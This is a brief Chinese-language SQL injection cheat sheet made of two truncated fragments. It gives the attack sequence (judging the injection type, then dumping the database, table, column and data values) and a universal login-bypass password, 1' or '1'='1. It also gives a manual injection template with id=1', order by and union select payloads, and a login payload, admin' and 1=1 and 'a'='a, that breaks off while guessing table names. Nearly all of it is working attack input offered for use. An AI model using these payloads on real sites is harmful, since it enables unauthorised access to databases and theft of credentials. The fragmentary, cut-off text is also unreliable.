01-判断漏洞类型(字符型和数字型)02-爆库名03-报表名04-爆字段05-爆数据值万能密码:username:1' or '1'='1password:1' or '1'='1 手注模板: id=1#判断注入点id=1' #判断注入点id=1'and1=1#判断注入点id=1' and 1=2 #判断注入点id=1'orderby3--+ #判断字段数id=-1' union select 1,da...
pass=admin&name=admin' and 1=1 and 'a'='a 原SQL语句为SELECT * FROM data Where uname='admin' and 1=1 and 'a'='a' 登录成功 可以正常运行的目标地址已经构造成功,此时可将1=1部分用SQL查询语句替代,依次对数据库表名、表中字段名、用户和密码长度、用户和密码进行测试 4. 猜解数据库表名 http...